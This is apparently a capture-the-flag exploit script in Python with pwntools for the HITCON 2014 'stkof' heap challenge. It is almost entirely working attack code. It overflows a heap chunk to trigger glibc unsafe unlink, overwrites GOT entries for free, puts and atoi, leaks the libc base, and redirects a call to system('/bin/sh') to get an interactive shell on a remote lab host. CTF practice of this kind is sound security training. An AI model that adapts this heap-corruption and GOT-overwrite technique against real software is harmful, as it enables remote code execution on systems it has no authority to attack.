2014hitcon-stkof

unsafe unlink

from pwn import *
 
#p = process(["/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64//ld-2.23.so","./stkof"],env={"LD_PRELOAD":"/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6"})
#p = process(["./0ctfbabyheap"],env={"LD_PRELOAD":"./libc6_2.23-0ubuntu11.2_amd64.so"})
p = remote('10.10.31.156',10011)
context.terminal = ['tmux','splitw','-h']
context.log_level = "debug"
libc = ELF('/ctf/work/adworld/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc.so.6')
elf=ELF('./stkof')
 
def malloc(size):
    p.sendline("1")
    p.sendline(size)
def write(chunk,size,strs):
    p.sendline("2")
    p.sendline(chunk)  
    p.sendline(size)
    p.sendline(strs)
def free(chunk):
    p.sendline("3")
    p.sendline(chunk)
#Unlink
#gdb.attach(p)
malloc("128") #chunk1 use later
malloc("128") #chunk2
malloc("128") #chunk3
malloc("128") #chunk4 avoid topchunk
 
global_ptr=0x602150
sizeofint=8
write("2","144",p64(0)+p64(0x80)+p64(global_ptr-3*sizeofint)+p64(global_ptr-2*sizeofint)+b'a'*96+p64(0x80)+p64(0x90)) ##wirte chunk2 heap overflow
 
free("3") #unlink
p.recvuntil('OK\n')
payload = 8*b'a' + p64(elf.got['free']) + p64(elf.got['puts']) + p64(elf.got['atoi'])
write("2",str(len(payload)),payload)
payload = p64(elf.plt['puts'])
write("0",str(len(payload)),payload)
free("1")
libc_base=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b"\x00"))-libc.symbols['puts']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
system_addr = libc_base + libc.symbols['system']
print ("libc_base="+hex(libc_base))
print ("binsh_addr="+hex(binsh_addr))
print ("system_addr="+hex(system_addr))
 
payload = p64(system_addr)
#print(payload)
write("2",str(len(payload)),payload)
p.sendafter('OK\n',"/bin/sh\n")
p.interactive()